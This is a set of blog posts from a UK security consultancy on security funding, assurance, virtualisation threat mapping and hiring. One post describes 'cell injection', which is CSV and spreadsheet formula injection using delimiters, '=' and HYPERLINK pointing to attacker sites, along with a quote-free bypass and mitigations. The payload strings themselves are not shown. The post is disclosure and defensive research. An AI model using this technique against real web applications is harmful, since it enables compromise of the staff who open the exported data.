Showing posts with label security testing. Show all posts
Showing posts with label security testing. Show all posts

Thursday, 2 May 2013

Innovation Vouchers for Cyber Security

The Technology Strategy Board within the UK has recently provided access to funding (up to £5,000) for SMEs, entrepreneurs and early stage start-ups looking to gain assurance around their ‘Cyber Security’.

Funding IT Security and assurance activity can be a real barrier to SMEs. When it is placed against other competing priorities, it often does not win the battle for internal funding. Nevertheless it remains a key enabler to business success. The UK Government stepping in to provide help with funding is a really positive step and a great opportunity for SMEs to overcome the funding barrier.

This blog post takes a look at the funding on offer and more importantly provides clarity around the terms used. This will enable organisations to clearly identify those areas they want to engage with and make best use of this external funding.

First important note:
Closing date for applications is the 24th July 2013 and is for UK based companies.

Second important note:
Don't be put off or confused by the term 'Cyber'. 
We are actually talking about information technology and computers. 
For more background on what 'Cyber' and 'Cyber Security' actually means take a look at my last blog post

Innovation Vouchers for Cyber Security
The Innovation Vouchers can be used to secure specialist services and consulting to help with the following:

  • Businesses looking to protect new inventions and business processes.
  • Businesses looking to ‘cyber audit' their existing processes.
  • Businesses looking to move online and develop a technology strategy.
  • Business start-ups looking to develop an idea into a working prototype and needing to build cyber security into the business from the very beginning.

This offers quite a range of options and many business projects could be aligned to fit and therefore be eligible for funding, But lets take a look at one specific area and see what could be done.

Businesses looking to ‘cyber audit' their existing processes

Lets take 'Cyber' as meaning information technology and an 'Audit' meaning a systematic review or assessment. Then a 'Cyber Audit' in this context is more simply put as an audit of the organisations information security controls. 

Audits can be paper based, with an auditor conducting a review of an existing control, or be delivered as a technical assessment, such as a vulnerability assessment / penetration test.

Audits are great for looking at the policy and processes within an organisation, where as a technical assessment will test that those controls actually deliver the required or expected level of security. The key here is to choose the most appropriate engagement for your own requirements.

Why would conducting an audit be a good step to take?

Today our business environment is more complex and interconnected than ever before. Business environments rely on electronic data as their lifeblood and the systems that enable the storage, transport, access and manipulation of this data have become critical. This has resulted in an era where networks and the applications sitting within them have become the very backbone of every organisation, regardless of their size and market sector. 

An audit or assessment of an organisation’s current approach to security can be used to identify if adequate information security management is in place to protect the level of information asset being hosted, stored, transmitted or processed. 

Just remember to choose a security consultancy that will work in close partnership with you to tailor the solution required and not just sell you a 'Cyber Product'.

A good engagement will leave you with a clear understanding of areas for improvement, the potential impact to you and more importantly what can be done to address these. 

A bad engagement will most likely leave you swimming in a sea of FUD (Fear, Uncertainty and Doubt)  and the frequency of the word 'Cyber' is likely to be proportional to the amount of proprietary solutions that the vendor sells to fix the issues they find. 

Conclusion

Costs can be a significant barrier for SMEs when it comes to security and the use of jargon can get in the way of our understanding of what can be done and why it is important. 

However, even small organisations need to be aware of their exposure to security. So, with the use of funding and approaching it from a knowledgeable position you can drive an engagement that will enable your organisation to gain an understanding of the security risks you carry and how to start addressing them in a risk based manner.

If you are looking to make use of this voucher then more information can be found here.

Tuesday, 29 January 2013

Cell Injection

[Cell InjectionAttacking the end user through the application.

[Introduction]
At 7 Elements our approach to application security testing blends the identification of technical exposure with business logic flaws, which could lead to a breach in security. By taking this approach, and by understanding the business context and envisaged use, it is possible to provide a deeper level of assurance. We have used this approach to identify a novel attack that we have called, cell injection


[What is Cell Injection?]
Cell injection occurs where a user is able to inject valid spreadsheet function calls or valid delimited values into a spread sheet via a web front end that results in unintended consequences. A number of attacks exist, from simple data pollution to more harmful calls to external sources. 


[Basic injection technique]
At a simple level we can look to inject values that we can expect to be interpreted as valid Comma-Separated Values (CSV). For a widely used format, there is still no formal specification, which according to RFC4180 "allows for a wide variety of interpretations of CSV files". As such we should look to inject common values such as semicoloncomma or tab but also other values such as the ASCII characters " | ", "+" and "^". 


If these values are interpreted by the spreadsheet, then you can expect data pollution to occur . This happens by shifting cells from their expected location. The following example shows the "|" character being used to insert additional cells within a spreadsheet. This was done by inserting four "|" values within the 'Amount' field, which  results in the shifting of the values expected within D4 and E4 to appear in H4 and I4:



Where it is possible to insert the "=" sign, we can then attempt to use function calls within the spreadsheet. 

Microsoft list all possible functions, however, the one we are interested in for the purpose of attack is the HYPERLINK function. Which has the following syntax:

HYPERLINK(link_location,friendly_name)

What can you do with it? Firstly, we need to change the injected string to point to an external site under our control. For this example we will use our web site by submitting the following string:


If the friendly_name specified is created within the spread sheet then we have successfully injected our data: 




Within Microsoft Excel, a user clicking on this link will not be prompted for any confirmation that they are about to visit an external link. A single click will be enough to launch a browser and load the destination address. Using this approach, an attacker could configure the url to point to a malicious site containing browser based malware and attempt to compromise the client browser and gain access to the underlying operating system.



[Advanced Injection]
The basic HYPERLINK attack requires that you can inject double quotation marks around the link and friendly_name values. As this can be a commonly filtered out input, the basic attack may fail. To bypass this restriction, it is possible to use a more advanced technique to generate a valid HYPERLINK function. This approach uses calls to other cells within the spread sheet and therefore negates the requirement to supply double quotes. To use this approach you will need to set one cell as a “friendly_name” and a second cell as the "link_location”.  Lastly you will then need to inject the the HYPERLINK function, that references the locations of these fields. The following string shows such an attack:



As part of this Proof of Concept, we have hard-coded the cell values E4 and F4, but we believe it should be possible to dynamically create these using the ROW() and COLUMN() functions. Using this approach we can then create the 'Click Here' cell without the need for double quotes:



During our tests we have also identified other attack vectors, such as updating fields or cell value lookup functions, where we do not have direct access to the content from the web application. This could be used to overwrite data for our own gain or populate a cell that is then later used to echo out data to a client with a value from a normally hidden cell.



[Mitigation]
As this attack is focused on the end user of the spreadsheet, mitigation is best placed at the point the data is first input. As such we would recommend that user input is validated based upon what is required. The best method of doing this is via 'white-listing'. Where possible, all characters that have a valid meaning within the destination spread sheet should be removed from your white-list of valid characters.  We would also recommend that where possible you do not permit the equals sign as the first character in a field. 


Time for a working example and exploit:


[Setting the scene]

To illustrate this attack and to provide context we will use a scenario that we often come across during our engagements and is based on the use of third party provisioned services to deliver transactional functionality. With this type of service we often find that the back end data management and record retention is achieved by the use of spread sheets. To help provide a working example, we have developed a dummy transactional website. This site has two main functions, the end user facing application and an admin section. Users access the application over the internet to transfer funds electronically. The end organisation utilises the admin functionality to manage the site and via the application they can view transactions. They are also provided with the ability to download transactional data for internal processing and data retention. At a high level it would look like this:



[Attack Surface]
The main input fields that an attacker can interact with are as follows:



The application has been designed to provide defence against the OWASP Top 10. Specifically, the application has been coded to defend against common input validation attacks such as SQL Injection and Cross Site Scripting, as well as correctly validating all output that is displayed within the application. 

Given this scenario, the attack option will be limited to attacking the 'Back Office' component of this application. Robust security measures, as already discussed, have mitigated attacks against end users of the application, and direct attacks against the application and database have been mitigated. On further inspection, and through a manual testing approach that looks at the end to end business process involved, it would be noted that the 'Back Office' function of this application relies on the download and use of spread sheet data:



The data is lifted directly from the database and on download results in the spread sheet opening on the 'Back Office' computer screen: 



Let's now use our cell injection to compromise the integrity of the data stored within the spreadsheet and gain remote access to the 'Back Office' computer.  


[Exploit]
The following video shows how an attacker can use cell injection via the front client facing application to compromise an internal host. The attack requires the end user to place trust in the data, but then who doesn't trust content that they have decided to download?


Blogger video is a little limited, so for those who want to see all the detail, we have hosted the video here.

[Conclusion]
By taking the time to understand how data would be input into the system, and more importantly where the data is then output to an end user, we were able to develop a specific attack approach to directly target end users of the data and gain unauthorised access to systems and data. 

In this example, correct encoding of user supplied data in the context of its use had not been fully implemented and without this level of testing, would have appeared to be protected against input / output validation based attacks. This could lead to a false sense of security. Further to this, being able to attack internal hosts directly changes the assumed threat surface and therefore would raise issues around browser patch management and the lack of egress filtering in place.

As we have seen from this blog, testing should be more than just the OWASP Top 10. We need to think about the overall context of the application, the business logic in use and ultimately where and how our input is used and how it manifests as output. This provides a further example of the need to take a layered approach to security and accept that you can not achieve 100%. This highlights the need to implement a resilient approach, building upon a robust defensive posture, that takes into account the need to be able to detect, react and recover from a breach. 

Monday, 21 January 2013

Vacancy: Security Tester






Just a quick reminder that our current vacancy for an experienced security tester closes on the 1st February 2013.

More information can be found here and here.


Wednesday, 28 March 2012

The 7 Elements

A question I am often asked is what is behind the name '7 Elements'. So for this blog post, I am going to explore this in more detail and go through each of the 7 Elements in turn.

The name 7 Elements reflects the belief that there are seven core activities required within an organisation's approach to information security. Only by embedding all seven can an organisation truly deliver a holistic and resilient approach to information security, and one that will enable them to meet their businesses objectives and in the end, to survive.

The Elements


Design | Build | Manage | Embed | Adapt | Sustain | Assure



Out of the seven, the following six elements provide the foundations required for a resilient approach to security:

Design:

Within this element an organisation needs to define architecture, policies and standards to deliver a resilient approach to information security.

Build:

Next we need to deploy systems and infrastructure that meet your design and protect your organisation's information.

Manage:

Ongoing management is then required to ensure that your systems are operated securely and new projects align with your security design. This element can also include the management of complex security testing engagements.

Embed:

Embedding security strategy, culture and awareness into your business processes is vital to the overall organisational approach to security.

Adapt:

We do not live in a static environment, thus it is vital that we can respond to changes within the threat landscape with regular reviews and updates that inform all of the elements.

Sustain:

Incidents will happen, both malicious and unintentional, so there is a need to deliver business resiliency through Incident Management and Resiliency testing.


This then brings me to what I feel is the most important and often neglected element required:

Assure:

The 7th Element is all about gaining assurance over any aspect of your approach to security, through practical and pragmatic security testing. Many organisations will focus on aspects of the other elements and fail to gain assurance that their approach actually provides the level of protection required and as such could expose the organisation to hidden risks.

Security testing allows you to test assumptions and controls that are designed to provide a level of security and to gain assurance that that assumption / control actually does what was expected or more importantly doesn't do something unexpected that results in a compromise of data.


This approach would then lead to the following model:




Wednesday, 21 March 2012

Careers at 7 Elements

7 Elements is always looking for talented professionals to join our growing company. If you have a strong technical background delivering innovative testing and have the ability to translate technical issues into clear business related impact then we want to hear from you.

For more information, visit our careers page.

7 Elements does not accept agency CVs and will not be held responsible for any fees related to unsolicited CVs.

Friday, 12 August 2011

Compliance v’s Assurance

Compliance is often the sole assurance activity undertaken. But is this really enough?


Introduction

Many companies take steps to ensure that they comply with industry standards and regulations, as well as requiring individual business areas to meet the organisation’s own internal policies and standards/procedures. Compliance activity is then undertaken to check that these policies and standards are met.


What Is Compliance?

Compliance activity is generally carried out to confirm that a defined baseline standard of security is reached across the broad scope of an organisation. These baseline standards though do not necessarily ensure that systems, networks and assets meet the level of security required by the organisation or the individual business area, or that the security risk sits within the organisation’s risk appetite. Compliance alone will therefore not provide assurance that the organisation is secure, but rather that the policies and standards have been met.

As such, compliance can become a ceiling rather than the baseline.


Why Do More?

In addition to compliance, assurance should also be sought. The information security threat space is a rapidly evolving environment and as such security controls need to be responsive to prevent or combat the threat. Standards can easily and quickly become out of date. Compliance alone is therefore not enough. Assurance activity will take into account the broader threat environment, and look at the risks to an asset within the context of the external environment and the criticality of the data or function that the asset represents.


What is required?

A blended approach that takes into account the need to be compliant with policy and the ability to gain assurance is required to adequately manage IT Security risk effectively. Assurance testing would look to test the control to confirm that the control is not only the right control but that it also provides the level of protection required. This therefore provides a true assessment of the security risks faced by that asset and would expose any false sense of security that misplaced trust in a control had provided.

This approach would enable organisations to satisfy themselves that they are within risk appetite by ensuring that systems and assets not only meet the standards laid out in a policy but that the level of security risk is fully understood.

Tuesday, 4 January 2011

Threat Mapping and Security Testing within Virtualised Environments


Background

The deployment of Virtualisation within existing network architectures and the resulting collapse of network zones on to single physical servers are likely to introduce radical changes to current architectural and security models, resulting in an increased threat to the confidentiality, integrity or availability of the data held by such systems. Recent experience has already shown that the use of Virtualisation can introduce single points of failure within networks and successful attacks can result in the ability to access data from across multiple zones that would have historically been physically segregated.

To deal with this change will require a corresponding change to the architectural and security models used and a full understanding of the associated risks/threats that Virtualisation brings.

The purpose of this post is to set out areas that will need to be explored in order to gain assurance that Virtual Environments do not introduce or aggravate potential security vulnerabilities and flaws that can be exploited by an attacker to gain access to confidential information, affect data integrity or reduce the availability of a service.

Virtualisation raises lots of questions, including:

  • Will the Virtual Environment breach existing security controls that protect the existing physical estate? If so, how?

  • What additional controls will be required?
  • Does the proposed change exceed risk appetite?


Threat Mapping

To explore these questions, a comprehensive threat mapping exercise should be undertaken to look at the level of risk and threats associated with Virtualisation. This exercise should be tailored to be specific to the environment / business market that you are in (for example – financial organisations will need to be aware of regulatory requirements such as PCI-DSS which could impact on the use of irtualisation.)

A detailed threat map will aid in the development of a robust architectural model as well as feed in to any assurance work conducted. Such activity should be completed at the design stage and, failing that, at the latest prior to any deployment, as reviewing potential threats after deployment can result in costly redesign and implementation work.

Any risks and potential vulnerabilities that are identified during the threat analysis phase should be mitigated with appropriate security controls and built in to the design prior to implementation. Security testing should then be arranged to verify that the risks have been effectively mitigated.


Of course, in some instances there will be environments where threat mapping is not part of usual business security practice. Where there this is the case, any team conducting assurance activity should complete a tactical threat mapping exercise as part of their engagement and to inform the direction and context of any testing / recommendations. A tactical threat mapping exercise is one where less time and effort is applied and is more focused on a ‘how would we attack this system’ basis. Such an approach will take into account possible attack scenarios and is likely to form the basis of a penetration testing scoping exercise.

Technology and functionality changes fast and this can lead to a change within the attack surface of an organisation. Threat assessments should be an on-going activity, even a tactical threat assessment on a regular basis to take in to how changes in technology deployed affect the efficiency of existing controls will aid in the organisational understanding of the threats posed and may help to avoid a costly breach or loss of data.



Example Questions

Questions that should be asked as part of a threat mapping exercise:

How will Virtualisation impact the patch management process?

  • Consideration will be needed in terms of patching and virus control being in a centralised environment. Virtualisation introduces the risk of out-of-sync Virtual Machines existing within the network. As an example, introduction of VM snapshot/rollback functionality adds new capability to undo changes back to a "known good" state, but within a server environment when someone rolls back changes, they may also rollback security patches or configuration changes that have been made.

Is there sufficient segregation of administrative duties?

  • Layer 2 devices are becoming virtualised commodities; this could lead to a new breed of ‘virtualisation administrators’ who straddle the role of traditional network / security engineers and thus holding the keys to the virtual kingdom. SANs Virtualisation admins will be responsible for assigning storage groups to specific VMs, so again they're may have rights across that network divide as well, essentially making them Network/Server/Storage admins from a rights perspective.


Is there a suitable security model in place?

  • Where multiple user groups / zones or where different risk appetites exist within an environment then separate security models should be created to contain breaches within one zone and help protect against know attack types.
  • No single security model should be applied across all groups or zones.


Is there suitable resiliency built in to the environment?

  • What level of resiliency is required in terms of disaster recovery / denial of service mitigation and are they in place and more importantly are they effective?
  • Is there sufficient Disaster Recovery built in to the environment?

How does the virtual environment interact with existing network architectures and authentication mechanisms?

  • Does this introduce a weakness to the environment that could be utilised by a malicious party?


Has a design review been completed?

  • Virtualised environments are complex, as such during the design stage effective and detailed review of the proposed design should be conducted to aid the development of a more robust and secure system. The output from threat modelling should be incorporated in to this review to ensure that a suitable design is implemented.


Are you outsourcing any component of the virtualised environment?

  • Third party relationships have become a major focus over the last few years with several high profile data loss incidents in the media. The contract with the vendor should include appropriate clauses to ensure data security, while formally enabling testing and remediation activities. More specifically the contract should facilitate regular security testing.
  • Does the outsource contract allow you to define physical location of your data? The jurisdiction can affect not only the threat model, but also your handling of risks.


To Close

Any security testing conducted against the virtual environment should follow detailed and industry standard methodologies (OWASP , CREST ,OSSTM ) and comprise both infrastructure testing / build reviews and security device configuration reviews (i.e. firewall rule sets). However specific testing to break out of the virtual environment will need to be included as the ability to access the restricted hardware layer will result in data leakage and potentially the ability to compromise any other attached Virtual Machines (gaining unauthorised access to user data and systems).

Essentially many of the areas of risk which are specific to virtualization arise from the capabilities which it provides. For example virtualisation allows for the hosting of systems from different networks on a single physical server. This can have benefits in terms of reduced costs/datacentre space requirements, but also introduces a new perimeter between networks, the Virtualization hypervisor. So if there is a security issue which affects the hypervisor it can allow attackers to jump from one network zone to another, effectively bypassing existing security controls such as Firewalls.